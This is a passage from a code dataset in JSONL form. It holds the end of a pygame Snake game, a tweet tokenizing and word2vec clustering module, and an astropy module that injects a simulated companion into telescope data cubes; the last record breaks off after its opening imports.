tarda en moverse la serpiente\n time = time_now # el tiempo actual se vuelve el tiempo anterior\n snake.move_ip(snake_direction)\n snake_body_segments.append(snake.copy())# se agrega una copia de la cabeza de la serpiente a la lista de segmentos\n snake_body_segments = snake_body_segments[-length:]# se actualiza la lista de segmentos\n pg.display.flip()\n clock.tick(60)", "repo_name": "onurbsofa/Proyectos_Revividos.py", "sub_path": "Snake.py", "file_name": "Snake.py", "file_ext": "py", "file_size_in_byte": 2627, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.randrange", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.rect.Rect", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.rect", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "20049924390", "text": "import pathlib\nimport json\nfrom flask.globals import session\nimport pandas as pd\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.corpus import stopwords\nfrom gensim.models import Word2Vec\nfrom sklearn.cluster import KMeans\nfrom config import pathConfig\nimport re\nimport copy\n\ndef json2df(dirPath):\n dataLst = []\n if dirPath.exists():\n for jsonFile in dirPath.glob('*.json'):\n with open(jsonFile, 'r') as jf:\n try:\n jfData = json.load(jf)\n except:\n continue\n dataLst.extend(jfData)\n jf.close()\n\n return pd.DataFrame(dataLst)\n \n\ndef allRawGen(rawDirPath):\n allRawDf = json2df(rawDirPath)\n allRawDf.drop(list(range(1, 9)), inplace= True)\n allRawDf.to_json(pathConfig['woJapFile'], orient= 'split')\n \ndef tokenizedGen():\n allRawDf = pd.read_json(pathConfig['woJapFile'], orient= 'split')\n tweet_tokenizer = TweetTokenizer()\n \n # raw tokenized\n tokenizedLst = []\n for rowNum, rowData in allRawDf.iterrows():\n content = rowData['content']\n tokenizedLst.append(tweet_tokenizer.tokenize(content.lower())) \n toPrint = str(rowNum)\n print(\" \" * (10 - len(toPrint)) + toPrint, end='\\r')\n\n # read stop list\n with open(str(pathConfig['stopLst']), 'r') as f:\n stopLst = json.load(f)\n f.close()\n\n # read stop rule\n stopRule = json.load(open(pathConfig['stopRule'], 'r'))\n\n # filter out stop words -- length bound\n remainWords = []\n bigTemp = []\n for sentNum, sentence in enumerate(tokenizedLst):\n temp = []\n for word in sentence:\n if len(word) > stopRule['length lower bound'] and len(word) < stopRule['length upper bound']:\n temp.append(word)\n bigTemp.append(temp) \n toPrint = 'length bound' + str(sentNum)\n print(\" \" * (30 - len(toPrint)) + toPrint, end='\\r')\n\n remainWords = copy.deepcopy(bigTemp)\n bigTemp = []\n for sentNum, sentence in enumerate(remainWords):\n temp = []\n for word in sentence:\n if not word in stopLst:\n temp.append(word)\n bigTemp.append(temp)\n toPrint = 'stop list' + str(sentNum) + \" \"\n print(\" \" * (30 - len(toPrint)) + toPrint, end='\\r')\n \n remainWords = copy.deepcopy(bigTemp)\n bigTemp = []\n for sentNum, sentence in enumerate(remainWords[:]):\n temp = []\n try:\n firstReg = re.compile(stopRule['regex'][0])\n except IndexError:\n bigTemp = remainWords\n break\n else:\n for word in sentence:\n if not re.match(firstReg, word):\n temp.append(word)\n else:\n continue\n #print(word)\n for pattern in stopRule['regex'][1:]:\n regex = re.compile(pattern)\n for word in temp:\n if re.match(regex, word):\n temp.remove(word)\n #print(word)\n toPrint = 'regex ' + str(sentNum) + \" \"\n print(\" \" * (30 - len(toPrint)) + toPrint, end='\\r')\n bigTemp.append(temp)\n # output\n with open(str(pathConfig['tokenizedFile']), 'w') as opFile:\n json.dump(bigTemp, opFile)\n opFile.close()\n\ndef jsonFileReader(dirPathStr):\n dirPath = pathlib.Path(dirPathStr)\n dataLst = []\n if dirPath.exists():\n for jsonFile in dirPath.glob('*.json'):\n with open(jsonFile, 'r') as jf:\n try:\n jfData = json.load(jf)\n except:\n continue\n dataLst.extend(jfData)\n jf.close()\n\n articleCnt = 0\n try:\n articleCnt = len(dataLst)\n twitterRawDf = pd.DataFrame(dataLst).sample(n= 15).to_html(classes='data')\n except:\n twitterRawDf = pd.DataFrame()\n return articleCnt, twitterRawDf\n\ndef authorStat(filePath):\n allRaw = pd.read_json(filePath, orient= 'split')\n contentCntByAuthor = allRaw.groupby(by= 'author').count()[['content']]\n contentCntByAuthor.sort_values(by= 'content', ascending= False)\n print(contentCntByAuthor.columns)\n return contentCntByAuthor\n\n\ndef wordStat(filePath1, filePath2):\n stopwordLst = stopwords.words('english')\n allRaw = pd.read_json(filePath1, orient= 'split')\n tokenizedTb = pd.read_json(filePath2, orient= 'split')\n view1 = tokenizedTb.join(allRaw.reset_index()[['index', 'author']], on='index', rsuffix= '_words')\n view2 = view1[view1['pos_tag'].isin(['NN', 'NNP', 'NNS', 'NNPS'])]\n view2 = view2[~view2['word'].isin(stopwordLst)].groupby(by= ['author', 'word'])\n view3 = view2.count()[['wordCnt']].sort_values(by= ['author', 'wordCnt'], ascending= False)\n view3['rank'] = view3.groupby(by= ['author']).rank(ascending= False)\n view3.reset_index(inplace=True)\n return(view3)\n\ndef loadModel(filePath):\n return Word2Vec.load(filePath)\n\ndef wvCluster(wvModel, clusterCnt = 4):\n kMeansModel = KMeans(n_clusters= clusterCnt)\n kMeansModel.fit(wvModel.wv.vectors)\n\n similarLst= []\n for center in kMeansModel.cluster_centers_:\n similarLst.append(wvModel.most_similar([center], topn= 20))\n\n similarWordTb = pd.DataFrame(similarLst[0], columns = ['group_1', 'similarity_1'])\n for i, circle in enumerate(similarLst[1:]):\n temp = pd.DataFrame(circle, columns = [f'group_{i+2}', f'similarity_{i+2}'])\n similarWordTb = similarWordTb.merge(temp, left_index= True, right_index= True)\n\n similarWordTb.to_json(pathConfig['circleTb'], orient= 'split')\n return similarWordTb.to_html()\n\ndef grading(tokenizedLst, circleTb):\n clusterCnt = int(circleTb.shape[1] / 2)\n scoreDict = dict()\n for i in range(clusterCnt):\n currentGp = f'group_{i+1}'\n gradingDict = circleTb.iloc[:, 2 * i: 2 * (i + 1)].set_index(currentGp).to_dict()\n gradingDict = gradingDict[f'similarity_{i+1}']\n scoreDict[currentGp] = []\n for sentence in tokenizedLst:\n score = 0\n for word in sentence:\n try:\n score += gradingDict[word]\n except KeyError:\n continue\n scoreDict[currentGp].append(score / len(session))\n scoreTb = pd.DataFrame(scoreDict).reset_index()\n return scoreTb\n \n\n\ndef wordToVec_train(sentences):\n model = Word2Vec(sentences= sentences)\n\n", "repo_name": "jian5753/NTU2020Q1_twitter", "sub_path": "app/main/infunction.py", "file_name": "infunction.py", "file_ext": "py", "file_size_in_byte": 6450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.read_json", "line_number": 34, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 34, "usage_type": "name"}, {"api_name": "nltk.tokenize.TweetTokenizer", "line_number": 35, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 46, "usage_type": "name"}, {"api_name": "json.load", "line_number": 47, "usage_type": "call"}, {"api_name": "json.load", "line_number": 51, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 51, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 65, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 76, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 81, "usage_type": "call"}, {"api_name": "re.match", "line_number": 87, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 93, "usage_type": "call"}, {"api_name": "re.match", "line_number": 95, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 102, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 103, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 107, "usage_type": "call"}, {"api_name": "json.load", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 128, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 136, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 136, "usage_type": "name"}, {"api_name": "pandas.read_json", "line_number": 137, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 138, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec.load", "line_number": 148, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec", "line_number": 148, "usage_type": "name"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 151, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 158, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 160, "usage_type": "call"}, {"api_name": "config.pathConfig", "line_number": 163, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 181, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 182, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec", "line_number": 188, "usage_type": "call"}]} +{"seq_id": "20885029467", "text": "#!/usr/bin/env python3\nimport numpy as np\n\nfrom astropy.table import Table\nfrom astropy import units as u\nfrom .my_warnings import warnings\n\n\nclass InjectCompanion:\n '''\n This class is meant to be inherited by a KlipRetrieve() or PreInjectImages()\n class instance, not used individually.\n\n Contains self.inject_companion(), the key method for injecting a companion\n into a set of data cubes, and its associated support methods.\n\n If called from a PreInjectImages() instance on a directory of\n original \"observations\" from CreateImages(), the injection will occur\n without any subsequent alignment or subtraction of images.\n\n If called from a KlipRetrieve() instance, the injection will take place\n *after* alignment and subtraction.\n '''\n\n def _check_spectrum(self, arg, format):\n '''\n Called from `self.inject_companion()`. Validates a spectrum passed to\n that method based on its docstring. If it passes, gets the Table ready\n for flux binning in `self._get_bin_fluxes()`.\n\n Argument `arg` is either an astropy Table or a string file path to one.\n\n Argument `format` is a string representing the file format used to help\n astropy's Table.read() method read in the Table if `arg` is a string.\n '''\n if isinstance(arg, str):\n spectrum = Table.read(spectrum, format=format)\n else:\n spectrum = arg.copy()\n\n # rename columns\n spectrum.rename_column(spectrum.colnames[0], 'wvln')\n spectrum.rename_column(spectrum.colnames[1], 'flux')\n\n # check for units\n if spectrum['wvln'].unit is None or spectrum['flux'].unit is None:\n raise ValueError('Both columns must have units.')\n\n # convert/add wavelength and flux units\n spectrum['wvln'] = spectrum['wvln'].to(u.micron)\n spectrum['flux'] = spectrum['flux'].to(u.mJy, u.spectral_density(spectrum['wvln'].quantity))\n\n # sort by increasing wavelength (just to be sure)\n sort_by_wv = np.argsort(spectrum['wvln'])\n spectrum = spectrum[sort_by_wv]\n\n wvln_column = spectrum['wvln'].quantity\n flux_column = spectrum['flux'].quantity\n\n # cut table to nirspec wavelengths with breathing room on both edges\n # of half a slice's (wavelength step's) size\n step_size = self.wvlnths[1] - self.wvlnths[0]\n lo_ind = np.searchsorted(wvln_column,\n (self.lo_wv - step_size/2) * u.m, side='left')\n hi_ind = np.searchsorted(wvln_column,\n (self.hi_wv + step_size/2) * u.m, side='right')\n\n spectrum = spectrum[lo_ind:hi_ind]\n\n return spectrum\n\n def _get_bin_fluxes(self, spectrum):\n '''\n Called from `self.inject_companion()`. Divides a spectrum into bins\n based on wavelengths in `self.wvlnths`, calculates the mean flux in\n each bin, then returns the resulting array of binned flxues.\n\n Argument `spectrum` is an astropy Table that follows the requirements\n spelled out in the docstring of `self.inject_companion()`.\n '''\n wvln_column = spectrum['wvln'].quantity\n flux_column = spectrum['flux'].quantity\n\n # get step width between slices (wavelengths) -- should be constant\n step_size = self.wvlnths[1] - self.wvlnths[0]\n\n # create array with (wavelength) bin edges. bin and step width are equal\n # (wvlnth[x]'s edges are bin_edges[x:x+1+1])\n bin_edges = np.linspace(self.lo_wv - step_size / 2,\n self.hi_wv + step_size / 2,\n len(self.wvlnths) + 1, endpoint=True)\n\n # find where in (sorted) column of wavelength each edge falls\n bin_inds = np.searchsorted(wvln_column, bin_edges * u.m, side='right')\n # (same behavior as bisect_right)\n\n # fill an array of mean fluxes in each bin\n bin_fluxes = np.zeros(len(self.wvlnths)) * u.mJy\n for i in range(len(bin_inds) - 1):\n # record mean of fluxes whose wavelengths fall in this bin\n if bin_inds[i + 1] - bin_inds[i] > 0:\n bin_fluxes[i] = flux_column[bin_inds[i]\n : bin_inds[i + 1]].mean()\n # if there are no fluxes in this bin, record mean of fluxes\n # at the previous flux_column index and the current one\n else:\n bin_fluxes[i] = flux_column[bin_inds[i] - 1\n : bin_inds[i] + 1].mean()\n\n return bin_fluxes\n\n def _choose_random_sep(self, target_images):\n '''\n Called from `self._inject_companion()` if the user didn't specify a\n companion separation.\n\n Calculates separations that will safely remain in-frame for all\n pointings, then randomly chooses Y and X pixel distances from the set\n that remains. Returns those pixel distances along with the resulting\n distance magnitude in arcseconds.\n\n Argument `target_images` is a 4D array of data cubes from each target\n observation.\n '''\n pix_len = .1\n\n # limit to pixels that aren't within N pixels of star or the edge\n edge_gap = 2; st_gap = 1 #pixels\n min_sep = np.round(np.sqrt(2 * ((st_gap + 1) * pix_len)**2), 1)\n\n # find indices of brightest pixel in each cube's 0th slice\n # (all slices of a given image cube should have the same bright spot)\n star_locs = np.array([np.unravel_index(np.argmax(target_images[i, 0]),\n target_images[i, 0].shape)[::-1]\n for i in range(target_images.shape[0])])\n\n # in each image, get indices of possible pixels in each direction,\n # excluding ones too close to the edge\n poss_y = np.arange(target_images.shape[-2])[edge_gap:-edge_gap]\n poss_x = np.arange(target_images.shape[-1])[edge_gap:-edge_gap]\n\n # in each image, get the maximum safe pixel distance in each direction\n # (i.e. how many pixels from the star is the nearest edge in x and y?)\n max_ys = [np.abs(st_y - poss_y[-1])\n if np.abs(st_y - poss_y[-1]) < np.abs(st_y - poss_y[0])\n else np.abs(st_y - poss_y[0])\n for st_y in star_locs[:,0]]\n\n max_xs = [np.abs(st_x - poss_x[-1])\n if np.abs(st_x - poss_x[-1]) < np.abs(st_x - poss_x[0])\n else np.abs(st_x - poss_x[0])\n for st_x in star_locs[:,0]]\n\n # next, exclude pixels too close to the star\n max_safe_y = int(np.min(max_ys)); max_safe_x = int(np.min(max_xs))\n #print('max_safes', max_safe_y, max_safe_x)\n max_safe_sep = np.round(np.hypot(max_safe_x, max_safe_y))\n\n below_max_y = np.arange(-max_safe_y, max_safe_y + 1).astype(int)\n below_max_x = np.arange(-max_safe_x, max_safe_x + 1).astype(int)\n\n poss_dists_y = np.delete(below_max_y,\n np.s_[max_safe_y - st_gap\n : max_safe_y + st_gap + 1])\n poss_dists_x = np.delete(below_max_x,\n np.s_[max_safe_x - st_gap\n : max_safe_x + st_gap + 1])\n #print(poss_dists_x)\n #print(poss_dists_y)\n\n # choose companion x/y distances based on remaining, safe pixels\n dist_y = np.random.choice(poss_dists_y)\n dist_x = np.random.choice(poss_dists_x)\n dist_arc = np.hypot(dist_x * pix_len, dist_y * pix_len)\n #print(max_safe_sep, dist_y, dist_x)\n\n return dist_y, dist_x, dist_arc\n\n def inject_companion(self, cube_list, comp_scale=None, return_fluxes=False,\n star_spectrum=None, comp_spectrum=None,\n star_format=None, comp_format=None,\n separation=None, position_angle=0, verbose=True):\n '''\n There are two options for scaling.\n\n First, argument `comp_scale` is a float that makes the companion's flux\n X times the standard deviation of pixel intensity at the specified\n radial separation from the star in the pre-subtraction image. (Radial\n profile information comes from `self.pre_prof_hdu`.)\n\n Second, arguments `comp_spectrum` and `star_spectrum` should either be\n astropy Table objects *or* string paths to spectra files that can be\n read in as Tables. If you go the string route, you must also provide the\n proper format as argument `comp_format` or `star_format`. (See\n astropy's Table.read() documentation for more on acceptable formats.)\n\n Whichever route you take, the tables/files **must**:\n - have two columns of data. The first column should contain\n wavelengths; the second should contain fluxes.\n - have wavelength units of microns or something equivalent.\n - have flux density units of erg / s / cm**2 / Hz, erg / s / cm**3,\n mJy, or something equivalent.\n\n Argument `return_fluxes` is a boolean that, if True, makes this method\n return, in order, the HDUList of injected data cubes, the star's binned\n spectrum, and the companion's binned spectrum.\n\n Argument `separation` is a float that represents the separation of the\n companion from the star in arcseconds. (Note that the value is rounded\n to the nearest tenth of an arcsecond.) If it is `None`, the method will\n randomly choose a companion location that falls safely in-scene for all\n observations' data cubes.\n\n Argument `position_angle` is a float that represents the companion's\n position angle in degrees, relative to the star. The default is 0\n (north). It only has an effect if you've specified a separation.\n\n Argument `verbose` is a boolean that, when True, allows the method to\n print progress messages.\n\n The method will always return the new HDUList of injected data cubes.\n '''\n # gives PSF + PSF_shifted * F_planet/F_star, so star's PSF always ~= 1.\n\n print_ast = lambda text: print('********', text, '********', sep='\\n')\n my_pr = lambda txt: print_ast(txt) if verbose else None\n\n # find which child of this class is calling the method\n _is_klip_retrieve = 'KlipRetrieve' in repr(self)\n\n # I. Check on how the companion will be scaled\n if star_spectrum is not None and comp_spectrum is not None:\n if comp_scale is None:\n # validate both spectra. if str, open file. else, assumes Table\n star_spec = self._check_spectrum(star_spectrum, star_format)\n comp_spec = self._check_spectrum(comp_spectrum, comp_format)\n got_spectra = True\n else:\n raise ValueError('You must either provide `comp_scale` OR a '\n '`star_spectrum` and a `comp_spectrum`. All '\n 'three were provided.')\n elif comp_scale is not None:\n if _is_klip_retrieve:\n # continue on with comp_scale\n got_spectra = False\n else:\n raise ValueError('When calling from a `PreInjectImages()` '\n 'instance, you must include spectra; scaling '\n \"by scene's standard deviation is \"\n 'unavailable.')\n else:\n raise ValueError('You must either provide `comp_scale` OR a '\n '`star_spectrum` and a `comp_spectrum`.')\n\n # collect all cube data in one array\n cube_list = self._pklcopy(cube_list)[len(self.positions):]\n tgt_imgs = np.array([cube.data for cube in cube_list])\n\n msg1 = ('spectrally defined ' if got_spectra\n else f\"(location-specific) {comp_scale:.0f}-sigma \")\n msg2 = (', after alignment' if _is_klip_retrieve\n else ' into unaligned images')\n my_pr('injecting companion with ' + msg1 + 'intensity' + msg2 + '.')\n\n # II. Translate the companion images\n pix_len = .1\n if separation is None:\n # randomly generate the companion's x/y separation\n s_y, s_x, separation = self._choose_random_sep(tgt_imgs)\n pix_sep = np.round(separation / pix_len)\n else:\n theta = np.deg2rad(position_angle)\n pix_sep = np.round(separation / pix_len)\n\n # trigonometrically convert separation magnitude to x/y separations,\n # using astronomical convention where PA = 0 is north/up\n s_y = np.round(pix_sep * np.cos(theta)).astype(int)\n s_x = np.round(pix_sep * -np.sin(theta)).astype(int)\n\n # shift a copy of the star's PSF to the specified companion position\n # (pad doesn't accept negatives, so we must add zeros/slice creatively)\n cmp_imgs = np.pad(tgt_imgs, mode='constant', pad_width=\n ((0,0), (0,0),\n (s_y if s_y > 0 else 0, -s_y if s_y < 0 else 0),\n (s_x if s_x > 0 else 0, -s_x if s_x < 0 else 0))\n )[:, :,\n -s_y if s_y < 0 else 0: -s_y if s_y > 0 else None,\n -s_x if s_x < 0 else 0: -s_x if s_x > 0 else None]\n\n # warn that the companion might be off-frame if most flux is gone\n if (cmp_imgs.sum(axis=(2,3)) < .2).sum() != 0:\n warnings.warn('The companion may be off-frame in some slices. '\n 'Try reducing `separation` if this is undesirable.')\n\n # III. Scale the companion images\n if got_spectra:\n # get binned fluxes based on spectra and take their ratio\n star_fluxes = self._get_bin_fluxes(star_spec)\n comp_fluxes = self._get_bin_fluxes(comp_spec)\n slices_scaled_1x = (comp_fluxes / star_fluxes).value\n\n # extend the contrast array to repeat once per data cube\n slices_scaled = np.tile(slices_scaled_1x, (tgt_imgs.shape[0], 1))\n # (tgt_imgs.shape[0] x tgt_imgs.shape[1]), or (n_cubes x n_slices)\n else:\n # get pre-subtraction separation & flux std. dev data from all cubes\n pre_prof_data = np.array([cb.data for cb in self.pre_prof_hdu])\n arc_seps = pre_prof_data[:,:,0]\n flux_stds = pre_prof_data[:,:,1]\n\n # in all slices, get flux std. dev at given arcsecond separation\n rad_dist_inds = np.argmin(np.abs(arc_seps - separation), axis=2)\n slice_stds = flux_stds[np.arange(arc_seps.shape[0])[:,np.newaxis],\n np.arange(arc_seps.shape[1]),\n rad_dist_inds]\n\n # scale to turn those into `comp_scale`-sigma fluxes\n slices_scaled = slice_stds * comp_scale\n\n # NB: in the future, might need to scale BOTH the star and the companion\n # (that way you can see absorption features in the star and you don't\n # mistake wavelengths where the star gets fainter as emission features\n # for the companion).\n # this would lead to different total fluxes depending on slice of data\n # cube, which would mess with the current scaling in plot_subtraction().\n # would also probably be a good idea to multiply stackable cubes by the\n # stellar spectrum once that's implemented so the same behavior is\n # present in both the companion=False/True cases of plot_subtraction()\n\n # IV. Save companion's pixel position angle using law of cosines:\n # c^2 = a^2 + b^2 - 2*a*b*cos(theta) -> c^2 = 2*a^2 * (1 - cos(theta))\n # (where a = b = pix_sep and c is companion to north point pixel dist.)\n comp_to_north = np.hypot(pix_sep - s_y, 0 - s_x)\n\n # to get theta, the actual position angle, we need an inverse cosine.\n # ensure the coord given as its argument is in arccos' domain (-1 to 1)\n coord = ( -comp_to_north**2 / (2 * pix_sep**2) ) + 1\n coord = -1 if -1 > coord else 1 if 1 < coord else coord\n actual_PA = np.rad2deg(np.arccos(coord))\n\n # then, since arccos' range is only 0-180 degrees, account for 180-360.\n # it gives correct angle/wrong sign in that case (neg. s_x), so flip it\n if s_x > 0:\n actual_PA *= -1\n\n # V. Build a new HDUList with the injected images\n # in each cube, multiply each wavelength slice by its respective scaling\n # (add new axes to slices_scaled so dims work for array broadcasting)\n cmp_imgs *= slices_scaled[:, :, np.newaxis, np.newaxis]\n #cmp_imgs *= slices_scaled.reshape(slices_scaled.shape + (1,1))]\n\n # simulate the injection by summing the original and companion cubes\n inj_imgs = tgt_imgs + cmp_imgs\n\n # create the HDUList that will the hold new, injected target images\n try:\n inj_cubes = self._pklcopy(self.stackable_cubes[len(tgt_imgs):])\n except AttributeError:\n inj_cubes = self._pklcopy(self.data_cubes[len(tgt_imgs):])\n\n # Copy these injected images and associated info into the new data cube\n for i, cube in enumerate(inj_cubes):\n cube.data = inj_imgs[i]\n\n cube.header['PIXCOMPY'] = (s_y, \"this + PIXSTARY is companion's Y \"\n 'pixel location')\n cube.header['PIXCOMPX'] = (s_x, \"this + PIXSTARX is companion's X \"\n 'pixel location')\n cube.header['POSANGLE'] = (actual_PA, \"angle between companion and \"\n 'north pixels, deg.')\n\n if got_spectra:\n for n, ratio in enumerate(slices_scaled_1x):\n keyw = 'CONT' + f\"{n:04d}\"\n cube.header[keyw] = (ratio, f\"slice {n:}'s companion to \"\n 'star flux ratio')\n else:\n cube.header['XSIGMA'] = (comp_scale, 'comp. flux / stddev of '\n 'scene flux at separation')\n\n # if an injection has already occurred, replace it with this new one\n if hasattr(self, 'injected_cubes'):\n self.injected_cubes = inj_cubes\n my_pr('new, injected target images in `self.injected_cubes`.')\n\n # return new cubes (and fluxes, if requested)\n if return_fluxes:\n try:\n return inj_cubes, star_fluxes, comp_fluxes\n except NameError:\n warnings.warn('No spectra were provided; no fluxes to return.')\n\n else:\n return inj_cubes\n", "repo_name": "ojustino/subtract_psf", "sub_path": "subtract_psf/inject_images.py", "file_name": "inject_images.py", "file_ext": "py", "file_size_in_byte": 18836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.table.Table.read", "line_number": 37, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 37, "usage_type": "name"}, {"api_name": "astropy.units.micron", "line_number": 50, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 50, "usage_type": "name"}, {"api_name": "astropy.units.mJy", "line_number": 51, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 51, "usage_type": "name"}, {"api_name": "astropy.units.spectral_density", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.searchsorted", "line_number": 63, "usage_type": "call"}, {"api_name": "astropy.units.m", "line_number": 64, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.searchsorted", "line_number": 65, "usage_type": "call"}, {"api_name": "astropy.units.m", "line_number": 66, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.searchsorted", "line_number": 94, "usage_type": "call"}, {"api_name": "astropy.units.m", "line_number": 94, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "astropy.units.mJy", "line_number": 98, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.hypot", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.s_", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.delete", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.s_", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 172, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.hypot", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 282, "usage_type": "call"}, {"api_name": "my_warnings.warnings.warn", "line_number": 292, "usage_type": "call"}, {"api_name": "my_warnings.warnings", "line_number": 292, "usage_type": "name"}, {"api_name": "numpy.tile", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 313, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.hypot", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 349, "usage_type": "attribute"}, {"api_name": "my_warnings.warnings.warn", "line_number": 391, "usage_type": "call"}, {"api_name": "my_warnings.warnings", "line_number": 391, "usage_type": "name"}]} +{"seq_id": "14425758428", "text": "import time\nfrom collections import OrderedDict\nfrom collections.abc import ItemsView, 